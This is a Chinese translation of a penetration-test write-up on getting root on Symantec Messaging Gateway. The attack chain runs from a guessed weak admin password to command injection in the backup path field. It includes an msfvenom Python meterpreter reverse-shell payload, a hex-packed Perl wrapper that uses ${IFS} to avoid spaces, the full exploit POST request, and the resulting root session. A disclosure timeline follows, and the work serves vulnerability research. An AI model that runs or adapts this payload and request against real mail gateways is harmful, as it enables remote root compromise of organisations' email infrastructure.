Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

【技术分享】如何攻击Symantec Messaging Gateway:从弱口令到远程代码执行

$
0
0
【技术分享】如何攻击Symantec Messaging Gateway:从弱口令到远程代码执行

2017-06-15 10:03:44

阅读:399次
点赞(0)
收藏
来源: pentest.blog





【技术分享】如何攻击Symantec Messaging Gateway:从弱口令到远程代码执行

作者:興趣使然的小胃





【技术分享】如何攻击Symantec Messaging Gateway:从弱口令到远程代码执行

翻译:興趣使然的小胃

预估稿费:200RMB

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿


一、前言

如果你一直在关注我们的博客,你肯定会对我们撰写的“意外之旅”系列文章非常熟悉。在本文中,我会跟大家分享我们在实际生活中对Symantec Messaging Gateway的渗透测试经验,最终任务是实现目标系统上系统命令的远程执行。


二、初始阶段:枚举可用信息

枚举始终是最为关键的环节!针对客户的IP地址范围,我分别执行了DNS枚举、Google查询以及Nmap扫描。此外,我还在公开泄露数据源以及我们内部研发的密码数据库中搜索了目标公司的邮件信息。最终我找到了2个不同的凭证信息,其中1个凭证信息在2个月之前被录入到我们的内部数据库中。

当我对Nmap的扫描结果分析完毕之后,我发现客户的Symantec Messaging Gateway管理接口正公开暴露在互联网中。我使用Google搜索引擎,找到厂商提供的管理文档,查询这款产品的默认用户名。根据厂商说明,产品的默认用户名为admin,但密码需要用户在安装过程中单独指定。

因此我们的问题就转化为找出admin用户的密码!我准备尝试以下动作:

1、对公开泄露数据源中的哈希进行暴力破解,尝试通过Exchange服务器提供的OWA接口登录邮箱账户。然后挖掘所有可用的邮件信息,找出可能的密码。

2、对诸如admin、123456等的弱口令进行暴力破解。

实话实说,第二种办法相当奏效。实际使用的密码为Passw0rd,大写的P,数字0。这个密码是我手动试出来的,因为大多数IT员工在设置账户密码时需要包含至少1位大写字母以及1个数字,以满足域控的密码策略。出于这个原因,他们通常会使用这种组合来创建密码。

这个时刻对我们来说是一个“幸运时刻”。我们成功获取了Symantec Messaging Gateway网页入口的访问权限,但我还是想要获得更多突破!现在,我已踏上征途,开始探索。


三、前提假设

在开始分析目标产品的漏洞信息之前,我有如下几点假设:

1、产品使用ISO/OVA文件进行分发。

2、产品由著名的安全公司所生产,因此很难挖掘出重要的信息?(希望不要是这种情况)

3、产品的安全加固等级如同地狱一般严峻。

4、产品使用了非常复杂的应用架构。

我从官方页面下载了一个包含30天许可证的试用版产品。


四、拆解Symantec Messaging Gateway

安装完毕后,我发现Symantec Messaging Gateway使用了如下加固保护措施:

1、严格限制的shell。我可以通过SSH接口访问目标设备,但只能获取一个受限的shell。此外,目标主机上只开放了80及443端口。

2、目标对GRUB密码做了防护。

4.1 操作阶段:源代码

我需要访问管理接口的源代码,但因为受限shell的原因,我不能使用SSH接口。我可以考虑查找突破受限shell的方法,但这一过程可能会花费太多时间。因此,我决定采用如下步骤:

1、使用CentOS镜像启动目标虚拟机(因为该产品同样使用了CentOS)。

2、从镜像中选择“Rescue installed system”选项。

3、等待一段时间,直至启动过程结束。

4、打开“/mnt/sysimage/boot/grub.conf”文件,删除GRUB密码保护那一行。

5、使用Vmware选项卸载光盘镜像。

6、重启目标主机。


【技术分享】如何攻击Symantec Messaging Gateway:从弱口令到远程代码执行

启用GRUB密码保护的那一行

4.1.1 以root身份访问

通过grub菜单,我成功以单用户模式启动了目标主机,在这一模式下,我们可以直接获得root权限的shell,同时不启动任何服务。我原本打算禁用admin用户的受限shell,但后来还是决定使用其他的办法来解决这一问题。我修改了sshd_config文件,以便启用root用户访问功能,同时修改了root用户的密码。

再次启动目标主机。

4.1.2 探测并收集服务信息

我们能够以root身份,通过SSH接口访问目标主机,这意味着我们可以收集该产品的更多信息。我对目标主机做了一次NMAP扫描,扫描结果如下:

~sudonmap-sS-sV-p---open12.0.0.199-Pn-n PORTSTATESERVICEVERSION 22/tcpopensshOpenSSH5.3(protocol2.0) 25/tcpopensmtpSymantecMessagingGatewaysmtpd 443/tcpopenssl/httpApacheTomcat/CoyoteJSPengine1.1 8443/tcpopenssl/httpApacheTomcat/CoyoteJSPengine1.1 41002/tcpopenssl/unknown 41015/tcpopensmtpSymantecMessagingGatewaysmtpd 41016/tcpopensmtpSymantecMessagingGatewaysmtpd 41017/tcpopensmtpSymantecMessagingGatewaysmtpd 41025/tcpopensmtp 41443/tcpopenssl/httpApacheTomcat/CoyoteJSPengine1.1

443、8443以及41443端口:与管理接口相关的服务。

41015-41025端口:这个产品的设计初衷就是用于email分析的,因此开放这些端口很正常。

41002端口:这是什么鬼?

这个端口非常有趣,我们需要找出目标主机开放这个服务的目的。

[root@hacker~]#netstat-tnlp|grep41002 tcp000.0.0.0:410020.0.0.0:*LISTEN2560/bmagent [root@hacker~]# [root@hacker~]#psaux|grep2560 mailwall25600.00.355042812816?Sl12:350:00/opt/Symantec/Brightmail/scanner/sbin/bmagent-c/data/scanner/etc/agentconfig.xml [root@hacker~]# [root@hacker~]#file/opt/Symantec/Brightmail/scanner/sbin/bmagent

/opt/Symantec/Brightmail/scanner/sbin/bmagent: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/linux 2.6.18, not stripped

根据以上结果,我们可以知道是谁在监听这个端口。我使用netstat命令找出负责这个服务的具体程序,然后通过grep命令,找到程序具体执行的命令。最后一步,我使用file命令观察该文件是脚本文件还是二进制文件等信息。

[root@hacker~]#cat/data/scanner/etc/agentconfig.xml <?xmlversion="1.0"?> <!--Defaultagentconfigurationfileforbrightmail--> <!--InstallAnywhereMacrosinserted--> <installationxmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"version="6.0.0.0"> <configdir>/data/scanner/etc</configdir> <mtalogfile>/data/logs/maillog</mtalogfile> <packages> <packagename="agentPackage"installed="true"enabled="true"/> </packages> <programs> <programxsi:type="agentType"name="agent"> <loglevel="4"period="1"periodUnits="DAY"numberRetained="30">/data/logs/scanner/agent_log</log> <networkAddresshost="*"port="41002"/> <allowedIPs><allowedIP>127.0.0.1</allowedIP> <allowedIP>12.0.0.199</allowedIP> <allowedIP>1.1.1.1</allowedIP> <allowedIP>1.1.1.2</allowedIP> <allowedIP>1.1.1.3</allowedIP></allowedIPs> <sslcertFile="/data/scanner/etc/agent.cert"keyFile="/data/scanner/etc/agent.key"/> </program> </programs> </installation>

以上是配置文件的具体内容。虽然该软件在所有的网络接口上运行相关服务,但我们只能通过白名单IP地址来访问这个服务。让我们记住这一点,然后继续探索。

4.1.3 定位源代码

找到源代码的具体位置对我来说不是件难事。通过若干命令,就能找出Web服务所在的进程ID,以及启动该服务所执行的具体指令,如下所示。

[root@hacker~]#netstat-tnlp|grep443 tcp00:::41443:::*LISTEN2632/jsvc.exec tcp00:::8443:::*LISTEN2632/jsvc.exec tcp00:::443:::*LISTEN2632/jsvc.exec [root@hacker~]# [root@hacker~]#psaux|grep2632 bcc26322.113.83482224541216?Sl12:350:44jsvc.exec-userbcc-home/usr/java/latest-wait1200-pidfile/var/run/jsvc.pid-outfile/data/logs/bcc/catalina.out-errfile&1-Xmx800M-XX:MaxPermSize=128m-Djvm=bcc-Djava.awt.headless=true-Djava.util.logging.config.file=/data/bcc/conf/logging.properties-Dorg.apache.jasper.compiler.Parser.STRICT_QUOTE_ESCAPING=false-Dorg.apache.el.parser.SKIP_IDENTIFIER_CHECK=true-Dcatalina.base=/data/bcc-Dcatalina.home=/usr/share/apache-tomcat-7.0.62-Djava.io.tmpdir=/data/bcc/temp-cp/usr/share/java/commons-daemon.jar:/usr/share/apache-tomcat-7.0.62/bin/bootstrap.jar:/usr/share/apache-tomcat-7.0.62/bin/tomcat-juli.jarorg.apache.catalina.startup.Bootstrap root81060.00.0103312856pts/0S+13:100:00grep2632 [root@hacker~]#

从上述输出信息中,我发现貌似有个用户名为bcc。果不其然,我在“/data/bcc”这个文件夹中找到了管理接口的全部源代码。

我压缩了整个文件夹,然后通过SCP将源代码压缩包拷贝出来。

4.2 追踪未知服务

现在我们已经拿到了源代码,我们还需要知道某个服务的目的。我使用jd-gui工具,深入分析了程序的JAVA源码,这个工具也是我最喜欢的java反编译器。

根据前面情况可知,这个服务只能通过白名单IP地址来访问。这意味着,源代码中肯定使用的是127.0.0.1这个地址,没有使用服务器所在的IP地址。此外,127.0.0.1也是第一个白名单IP地址。

我在源代码中搜索127.0.0.1这个字符串,并在backupNow函数中找到如下代码片段:

try { if(this.log.isInfoEnabled()){ this.log.info(this.rb.getLocalizedMessage("information.agent.script.databaseBackup.start")); } StringscriptName=NameHelper.getDbBackup(); AgentResultTOresult=ScriptHelper.executeScript("127.0.0.1",41002,scriptName, ScriptParamFactory.createAgentParam(params),2,AgentSettingsDAO.TimeoutLength.Infinite); if(this.log.isInfoEnabled()){ this.log.info(this.rb.getLocalizedMessage("information.agent.script.databaseBackup.end")); } if(result.isError()) { Stringmessage=ScriptHelper.decodeMessage(result); ScriptHelper.logError("error.agent.script.databaseBackup",message); ScriptHelper.generateError("error.agent.script.databaseBackup",message); } } catch(BrightmailExceptione) { ScriptHelper.generateError("error.agent.script.databaseBackup",e.getMessage()); }

这正是我想要看到的代码。应用程序将脚本名及参数作为数据发送给服务。让我们来找找哪个脚本会被执行。从代码中可知,scriptName参数的值由getDbBackup函数的返回值来决定。

publicstaticStringgetDbBackup() { if(dbBackup==null) { StringBuilderbuilder=newStringBuilder(25); builder.append("$SCRIPTSDIR$$/$"); builder.append("db-backup"); dbBackup=builder.toString(); } returndbBackup; }

非常棒,现在我们知道了哪个脚本或者程序会被执行,让我们来找到它。

[root@hackerbcc]#find/opt/-typef|grep'db-backup' /opt/Symantec/Brightmail/cli/bin/db-backup /opt/Symantec/Brightmail/cli/sbin/db-backup /opt/Symantec/Brightmail/cli/man/man1/db-backup.1 [root@hackerbcc]# [root@hackerbcc]#cat/opt/Symantec/Brightmail/cli/bin/db-backup #!/bin/sh ./data/scanner/etc/brightmail-env /usr/bin/sudo/opt/Symantec/Brightmail/cli/sbin/db-backup"$@"

事情变得越来越有趣。当某个任务由该服务启动后,这个任务会执行一个db-backup bash脚本,这个脚本会使用sudo命令执行另外一个命令。

现在是时候找出执行这个流程的最终要素了。感谢strust.xml文件的帮助,我们借此能找出哪个URL被映射到哪个类和方法上。xml文件的定义如下所示:

<actionpath="/backup/add"forward="/backup/action2.do?method=add"/> <actionpath="/backup/edit"forward="/backup/action2.do?method=edit"/> <actionpath="/backup/backupNow"forward="/backup/action2.do?method=showBackupNow"/> <actionpath="/backup/action2" type="com.symantec.smg.controlcenter.disasterrecovery.backup.BackupAction" name="backupForm" scope="request" parameter="method" validate="false" input="/admin_backup_restore.jsp"> <forwardname="success"path="/admin_backup_edit.jsp"/> </action>

这意味着我们可以通过“/brightmail/admin/backup/backupNow.do”来执行这个流程。在应用软件中,与之对应的屏幕截图如下所示。


【技术分享】如何攻击Symantec Messaging Gateway:从弱口令到远程代码执行

现在我们知道Symantec能够通过FTP或者SCP将备份文件存储到远程服务器上。由于这一过程通常耗时较长,因此他们决定通过后台任务方式执行这一过程,同时使用41002端口所对应的服务用来管理这类任务。让我们来重复这一过程,看看哪条命令会被执行。

[root@hackerbcc]#psaux|grep12.0.0.15 mailwall112960.00.01082041308?S13:370:00/bin/sh/opt/Symantec/Brightmail/common/sbin/db-backup-fSCP://root:toor@12.0.0.15/tmp-t1-smanual root112970.00.01750962672?S13:370:00/usr/bin/sudo/opt/Symantec/Brightmail/cli/sbin/db-backup-fSCP://root:toor@12.0.0.15/tmp-t1-smanual root112985.00.517358423132?S13:370:00/usr/bin/perl-w/opt/Symantec/Brightmail/cli/sbin/db-backup-fSCP://root:toor@12.0.0.15/tmp-t1-smanual root113030.00.0572442400pts/2Ss+13:370:00/usr/bin/scp-P22-q/data/tmp/db-backup.10.6.2-7.brightmail.Apr-26-17-13-37.tarroot@12.0.0.15:/tmp.full.manual.tar.bz2 root113040.00.0597002952pts/2S+13:370:00/usr/bin/ssh-x-oForwardAgentno-oPermitLocalCommandno-oClearAllForwardingsyes-p22-q-lroot12.0.0.15scp-t/tmp.full.manual.tar.bz2 root113070.00.0103308872pts/0S+13:370:00grep12.0.0.15 [root@hackerbcc]#

非常棒!这个位置很有可能存在命令注入漏洞。你可以看到,我们通过Web界面设置的参数最终会被bmagent服务所使用,以便通过SSH方式传输文件。

让我们来看看哪个地方会对输入进行验证。我敢打赌,在输入被投递到bmagent服务之前,这个Web应用肯定会在某处对输入进行验证。

4.3 找出存在漏洞的参数

负责输入验证的代码如下:

if(storeRemoteBackup) { if(EmptyValidator.getInstance().isValid(remoteBackupAddress)) { exceptionMsgKeys.add("error.backup.host.ip.required"); focusElement="remoteBackupAddress"; } elseif((!DomainValidator.getInstance().isValid(remoteBackupAddress))&& (!RoutableIpValidator.getInstance().isValid(remoteBackupAddress))) { exceptionMsgKeys.add("error.backup.host.ip.invalid"); focusElement="remoteBackupAddress"; } if(EmptyValidator.getInstance().isValid(port)) { exceptionMsgKeys.add("error.backup.host.port.empty"); focusElement="remoteBackupPort"; } elseif(!TcpUdpPortValidator.getInstance().isValid(port)) { exceptionMsgKeys.add("error.backup.host.port.invalid"); focusElement="remoteBackupPort"; } Stringpath=backupForm.get("remoteBackupPath").toString(); if(EmptyValidator.getInstance().isValid(path)) { exceptionMsgKeys.add("error.backup.path.empty"); focusElement="remoteBackupPath"; } else { UsAsciiValidatorv=UsAsciiValidator.getInstance(); if(!v.isValid(path)) { exceptionMsgKeys.add("error.backup.path.only.ascii.allowed"); focusElement="remoteBackupPath"; } } }

验证过程使用了如下规则:

1、remoteBackupAddress不能为空。

2、remoteBackupAddress必须为可路由的IP地址。

3、端口(port)不能为空。

4、端口必须为有效的TCP和UDP端口。

5、路径(path)不能为空。

6、路径必须是ASCII字符串。

因此我们显然可以通过path参数实现命令注入。

4.4 完成攻击任务

我们可以通过以下步骤完成命令注入攻击任务。

1、使用有效凭证登陆应用。

2、转到“/brightmail/admin/backup/backupNow.do”。

3、选择“Store backup on a remote location”选项。

4、选择协议类型为SCP。

5、填入某个有效的SSH服务所对应的IP地址、端口信息。(你可以使用kali系统搭建这个服务)。

6、启用“Requires authentication”功能。

7、填入SSH服务所对应的用户名及密码信息。

8、将攻击载荷放在tmp参数上。不要忘了使用“$()”或者“``”,这样才能执行命令注入攻击。

在我的测试过程中,我发现在载荷中使用空格符(SPACE)会导致某些环节崩溃,你可以使用$IFS来替换空格符。

4.5 PoC

我喜欢使用meterpreter,总是倾向于获取一个meterpreter shell,不喜欢获取cmd shell。我用来获取python版meterpreter的技巧如下。

首先,使用msfvenom来生成python版的载荷。

msfvenom-ppython/meterpreter/reverse_tcpLHOST=12.0.0.1LPORT=8081-fraw importbase64,sys;exec(base64.b64decode({2:str,3:lambdab:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQpzLmNvbm5lY3QoKCcxMi4wLjAuMScsODA4MSkpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=')))

因此,我需要将载荷传递到python -c "PAYLOAD"命令中,但应用程序不允许使用空格符,因此我使用的是${IFS},这样一来,最终的载荷就变成python${IFS}-v${IFS}"PAYLOAD"。但问题在于我们的载荷内部还有一个空格符,位于import以及base64之间,并且${IFS}是Linux可以用的一个小技巧,但对python来说并不适用!

现在是发挥创造力的时间了。我想到了一个主意。我可以使用perl载荷。因为根据我之前的经验,我可以创造一个不带有空格符的perl载荷。因此,我们可以构建一个perl载荷,利用这个载荷执行我们的meterpreter python载荷。

实现的方法如下:

cmd="python-c\"#{payload.encoded}\"" final_payload=cmd.to_s.unpack("H*").first p="perl${IFS}-e${IFS}'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'"

最终的载荷如下所示:

perl${IFS}-e${IFS}'system(pack(qq,H732,,qq,707974686f6e202d632022696d706f7274206261736536342c7379733b65786563286261736536342e6236346465636f6465287b323a7374722c333a6c616d62646120623a627974657328622c275554462d3827297d5b7379732e76657273696f6e5f696e666f5b305d5d28276157317762334a3049484e765932746c6443787a64484a315933514b637a317a62324e725a5851756332396a613256304b4449736332396a613256304c6c4e5051307466553152535255464e4b51707a4c6d4e76626d356c5933516f4b4363784d6934774c6a41754d5363734e4451304e436b70436d77396333527964574e304c6e56756347466a6179676e506b6b6e4c484d75636d566a646967304b536c624d46304b5a44317a4c6e4a6c5933596f62436b4b6432687062475567624756754b4751705047773643676c6b4b7a317a4c6e4a6c5933596f624331735a57346f5a436b70436d56345a574d6f5a4378374a334d6e4f6e4e394b516f3d2729292922,))')

这是一个包含python版meterpreter载荷的perl载荷。现在是时候搞定shell了。我向服务器以HTTP方式发送如下POST请求,成功触发了漏洞:

POST/brightmail/admin/backup/performBackupNow.doHTTP/1.1 Host:12.0.0.199:8443 User-Agent:Mozilla/5.0(windowsNT10.0;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/47.0.2526.73Safari/537.36 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language:en-US,en;q=0.5 Content-Type:application/x-www-form-urlencoded Content-Length:1188 Referer:https://12.0.0.199:8443/brightmail/admin/backup/backupNow.do Cookie:JSESSIONID=67376D92B987724ED2309C86990690E3;userLanguageCode=en;userCountryCode=US;navState=expanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded;JSESSIONID=0360B579A58BBBB8D74FEE4767BCAC10 Connection:close Upgrade-Insecure-Requests:1 pageReuseFor=backup_now&id=&symantec.brightmail.key.TOKEN=48f39f735f15fcaccd0aacc40b27a67bf76f2bb1&backupData=full&customType=configuration&includeIncidentMessages=true&includeReportData=true&includeLogData=true&backupTo=2&remoteBackupProtocol=SCP&remoteBackupAddress=127.0.0.1&remoteBackupPort=22&remoteBackupPath=tmp$(perl${IFS}-e${IFS}'system(pack(qq,H732,,qq,707974686f6e202d632022696d706f7274206261736536342c7379733b65786563286261736536342e6236346465636f6465287b323a7374722c333a6c616d62646120623a627974657328622c275554462d3827297d5b7379732e76657273696f6e5f696e666f5b305d5d28276157317762334a3049484e765932746c6443787a64484a315933514b637a317a62324e725a5851756332396a613256304b4449736332396a613256304c6c4e5051307466553152535255464e4b51707a4c6d4e76626d356c5933516f4b4363784d6934774c6a41754d5363734e4451304e436b70436d77396333527964574e304c6e56756347466a6179676e506b6b6e4c484d75636d566a646967304b536c624d46304b5a44317a4c6e4a6c5933596f62436b4b6432687062475567624756754b4751705047773643676c6b4b7a317a4c6e4a6c5933596f624331735a57346f5a436b70436d56345a574d6f5a4378374a334d6e4f6e4e394b516f3d2729292922,))')&requiresRemoteAuthentication=true&remoteBackupUsername=root&remoteBackupPassword=qwe123

漏洞触发过程如下所示:

msfexploit(handler)>run [*]StartedreverseTCPhandleron12.0.0.1:4444 [*]Startingthepayloadhandler... [*]Sendingstage(39842bytes)to12.0.0.199 [*]Meterpretersession2opened(12.0.0.1:4444->12.0.0.199:54077)at2017-04-3017:03:26+0300 meterpreter>shell Process15849created. Channel1created. sh:nojobcontrolinthisshell sh-4.1#id uid=0(root)gid=0(root)groups=0(root) sh-4.1#

我们在Symantec Messaging Gateway上获取了一个root权限的shell,然后继续渗透测试旅程。然而我不能与大家分享我们后续的渗透过程,因为这一过程包含客户的敏感信息。

4.6 Metasploit模块

我同样实现了一个metasploit模块,该模块的工作过程如下所示(gif动图):


【技术分享】如何攻击Symantec Messaging Gateway:从弱口令到远程代码执行

大家可以通过此链接获取这个模块。


五、时间线

2017年4月24日:发现漏洞

2017年4月24日:在没有获得厂商支持的前提下,我们向PRODAFT GPACT成员们共享了漏洞的细节及应急补救方法。

2017年4月26日:第一次与厂商接触。

2017年5月2日:Symantec产品团队确认漏洞有效。

2017年5月25日:我们请求漏洞相关的更新信息。

2017年5月25日:Symantec回复说他们已经准备在6月份发布补丁,补丁发布时会通知我们。

2017年6月8日:我们的客户通知我们他们已经收到厂商的更新通知。看样子Symantec在没有通知我们的前提下,就发布了10.6.3版本的更新版本,也没有通知我们对补丁有效性进行确认。

2017年6月10日:漏洞细节向公众公布。



【技术分享】如何攻击Symantec Messaging Gateway:从弱口令到远程代码执行
【技术分享】如何攻击Symantec Messaging Gateway:从弱口令到远程代码执行
本文由 安全客 翻译,转载请注明“转自安全客”,并附上链接。
原文链接:https://pentest.blog/unexpected-journey-5-from-weak-password-to-rce-on-symantec-messaging-gateway/

Viewing all articles
Browse latest Browse all 12749

Latest Images

Trending Articles





Latest Images